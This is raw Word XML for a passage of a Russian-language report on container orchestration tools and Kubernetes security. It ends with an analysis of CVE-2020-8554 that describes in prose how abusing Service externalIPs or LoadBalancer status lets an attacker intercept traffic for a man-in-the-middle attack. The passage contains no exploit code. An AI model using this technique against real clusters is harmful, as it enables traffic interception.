      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fargate</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50277455" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Nomad</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> — один из самых близких концептуальных конкурентов Kubernetes. Это scheduler и orchestrator для контейнеров, бинарников и batch-задач, который может работать в cloud, on-prem и гибридных окружениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC89A8" w14:textId="1B203625" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Docker Swarm mode</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> встроен в Docker Engine и позволяет управлять кластером Docker-нод как swarm-кластером. Docker прямо описывает Swarm mode как механизм для управления кластером Docker daemons и отмечает, что текущие версии Docker включают Swarm mode; при этом старый Docker Classic Swarm больше активно не развивается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD84330" w14:textId="60EA6745" w:rsidR="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717">
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Amazon ECS</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> — fully managed container orchestration service от AWS для деплоя, управления и масштабирования контейнеризированных приложений. Он глубоко интегрирован с AWS-экосистемой. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>AWS Fargate</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0717">
        <w:t xml:space="preserve"> позволяет запускать контейнеры через ECS без управления серверами или EC2-кластерами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4465CD5E" w14:textId="39F04048" w:rsidR="00565ACE" w:rsidRDefault="00565ACE" w:rsidP="00565ACE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc231834649"/>
      <w:r>
        <w:t>вопросы безопасности контейнеризации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="103F91EF" w14:textId="544A6452" w:rsidR="00565ACE" w:rsidRDefault="00565ACE" w:rsidP="00565ACE">
      <w:r>
        <w:t xml:space="preserve">Безопасность </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00565ACE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>является критическим вопросом при эксплуатации кластеров с контейнерами. Правильно настроенные компоненты позволяют избежать утечки конфидециальных данных</w:t>
      </w:r>
      <w:r w:rsidR="00F31D8D">
        <w:t xml:space="preserve">. Так как существует четкое разделение компонентов по работе с публичными и конфидециальными данными, а также наличие главной ноды с уровнем привилегий администратора, безопасность </w:t>
      </w:r>
      <w:r w:rsidR="00F31D8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00F31D8D" w:rsidRPr="00F31D8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F31D8D">
        <w:t>является критическим аспектом при разработке решения на основе кластера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3F965" w14:textId="240B1A32" w:rsidR="00F31D8D" w:rsidRDefault="00F31D8D" w:rsidP="00565ACE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Основные риски безопасности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">связанны с работой главной ноды, так как она содержит прямой доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сервиса. Для безопасности следует ограничить доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с помощью аутентификации и сетевыми ограничениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F9D65" w14:textId="71F11E98" w:rsidR="00F31D8D" w:rsidRDefault="00F31D8D" w:rsidP="00565ACE">
      <w:r>
        <w:t xml:space="preserve">Также стоит запретить запуск контейнеров, имеющих привилегии, особенно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D8D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>права</w:t>
      </w:r>
      <w:r w:rsidR="00071FF5">
        <w:t>, дабы избежать возможных инъекий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5894A28B" w14:textId="5A09A72F" w:rsidR="00071FF5" w:rsidRDefault="00071FF5" w:rsidP="00071FF5">
      <w:r>
        <w:t xml:space="preserve">Для безопасной работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pod</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ов стоит соблюдать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pod</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Standarts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Также настроить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>limits</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и памяти, чтобы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pod</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>не смог перегрузить серверные ресурсы и не нарушить работу всего кластера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BE8C5" w14:textId="52FF08E8" w:rsidR="00071FF5" w:rsidRDefault="00071FF5" w:rsidP="00071FF5">
      <w:r>
        <w:t xml:space="preserve">Еще необходимо хранить конфидециальную информацию только в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">а также ограничить доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ETCD</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">элементу главной ноды, где хранятся незашифрованные данные из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Прямые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00864663">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>доступы к узлам необходимо ограничивать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCE4AC" w14:textId="16A6DBF9" w:rsidR="00071FF5" w:rsidRDefault="00071FF5" w:rsidP="00071FF5">
      <w:r>
        <w:t xml:space="preserve">Для повышения отказоустойчивости следует грамотно настроить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ingress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>servive</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00071FF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>основные каналы связи для рабочих нод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D49199" w14:textId="7FD04E86" w:rsidR="00071FF5" w:rsidRDefault="00543F7E" w:rsidP="00071FF5">
      <w:r>
        <w:t xml:space="preserve">Таким образом безопасность </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00543F7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>напрямую зависит от процесса эксплуатации. Из-за того, что один кластер контроллирует работу целой экосистемы микросервисов, очень важно соблюдать правила безопасного хранения данных, а также следить за привилегиями рабочих нод и прямого доступа к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0564E3" w14:textId="77777777" w:rsidR="00FA35AF" w:rsidRPr="00543F7E" w:rsidRDefault="00FA35AF" w:rsidP="00071FF5"/>
    <w:p w14:paraId="725E83AE" w14:textId="77777777" w:rsidR="006E0717" w:rsidRPr="006E0717" w:rsidRDefault="006E0717" w:rsidP="006E0717"/>
    <w:p w14:paraId="1218D890" w14:textId="77777777" w:rsidR="006D4C69" w:rsidRPr="006D4C69" w:rsidRDefault="006D4C69" w:rsidP="006D4C69"/>
    <w:p w14:paraId="5F8C58D0" w14:textId="15E2C018" w:rsidR="007D296C" w:rsidRPr="00791EC8" w:rsidRDefault="00FC006D" w:rsidP="00FF2D6B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0DEA0" w14:textId="3883F9D6" w:rsidR="002D2E17" w:rsidRDefault="00FA35AF" w:rsidP="00403A26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc231834650"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ход работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="6BABCAC8" w14:textId="7BDAC621" w:rsidR="00FA35AF" w:rsidRPr="00864663" w:rsidRDefault="00FA35AF" w:rsidP="00FA35AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc231834651"/>
      <w:r>
        <w:t xml:space="preserve">исследование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA35AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в экосистеме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA35AF">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="6240D981" w14:textId="5BA8687C" w:rsidR="00134D62" w:rsidRPr="00EB2400" w:rsidRDefault="00757DB2" w:rsidP="00134D62">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00757DB2">
        <w:t>CVE-2020-8554</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A2E29">
        <w:t xml:space="preserve">обнаружена в </w:t>
      </w:r>
      <w:r w:rsidR="00CC6714">
        <w:t xml:space="preserve">объекте </w:t>
      </w:r>
      <w:r w:rsidR="00CC6714">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t>. Основной</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t>риск</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t>поля</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spec</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loadBalancer</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ingress</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t xml:space="preserve">Уязвимость заключается в случае, если атакующий уже может создать </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t xml:space="preserve">и указывать </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spec</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t xml:space="preserve"> или обновлять статус у поля </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadBalancer</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t xml:space="preserve">объекта </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00134D62" w:rsidRPr="00134D62">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t xml:space="preserve">то он может перехватывать трафик к данному </w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00134D62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DA7B8A">
        <w:t xml:space="preserve"> Проблема заключается </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:t xml:space="preserve">в отсутвие проверки принадлежности этого </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00EB2400" w:rsidRPr="00EB2400">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:t xml:space="preserve">к конкретному </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidR="00EB2400" w:rsidRPr="00EB2400">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:t xml:space="preserve">Злоумышленник может создать </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:t xml:space="preserve"> с данным </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00EB2400" w:rsidRPr="00EB2400">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:t xml:space="preserve">и принимать трафик, идущий на указанный </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00EB2400" w:rsidRPr="00EB2400">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:t xml:space="preserve">Данная уязвимость также дает доступ к атаке вида </w:t>
      </w:r>
      <w:r w:rsidR="00EB2400">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITM.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4"/>
        <w:gridCol w:w="6807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F7018B" w14:paraId="392DF28A" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="475"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F9492B6" w14:textId="397E82FC" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CD39C5" w14:textId="53D56F5D" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="5671BE47" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="462"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32BE65E9" w14:textId="7EED410F" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Идентификатор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D587AF4" w14:textId="78C43019" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00351BF7" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00757DB2">
              <w:t>CVE-2020-8554</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w:rsidRPr="00AA223A" w14:paraId="4E2E86DE" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="490"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649D8940" w14:textId="23BEA1FB" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Уязвимый компонент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9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B590A" w:rsidRPr="00C3692D" w14:paraId="5C667F14" w14:textId="77777777" w:rsidTr="00FF2D6B">
              <w:trPr>
                <w:trHeight w:hRule="exact" w:val="1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147F59" w14:textId="77777777" w:rsidR="00EB590A" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
                  <w:pPr>
                    <w:ind w:firstLine="0"/>
                    <w:rPr>
                      <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0AA745D4" w14:textId="2B95D097" w:rsidR="00F7018B" w:rsidRPr="00C3692D" w:rsidRDefault="00351BF7" w:rsidP="00590C0F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C3692D">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Service.spec.externalIPs</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00C3692D" w:rsidRPr="00C3692D">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C3692D" w:rsidRPr="00C3692D">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>status.loadBalancer.ingress</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00C3692D" w:rsidRPr="00C3692D">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="7FEB63F6" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="475"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F8DCF8" w14:textId="287BABDA" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Тип уязвимости</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B420CA2" w14:textId="7E2BA579" w:rsidR="00F7018B" w:rsidRPr="00C3692D" w:rsidRDefault="00C3692D" w:rsidP="00EB590A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MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7018B" w14:paraId="20B49026" w14:textId="77777777" w:rsidTr="00FF2D6B">
        <w:trPr>
          <w:trHeight w:val="351"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3194" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0466CEA7" w14:textId="6A6726DF" w:rsidR="00F7018B" w:rsidRPr="00FF2D6B" w:rsidRDefault="00EB590A" w:rsidP="00EB590A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2D6B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
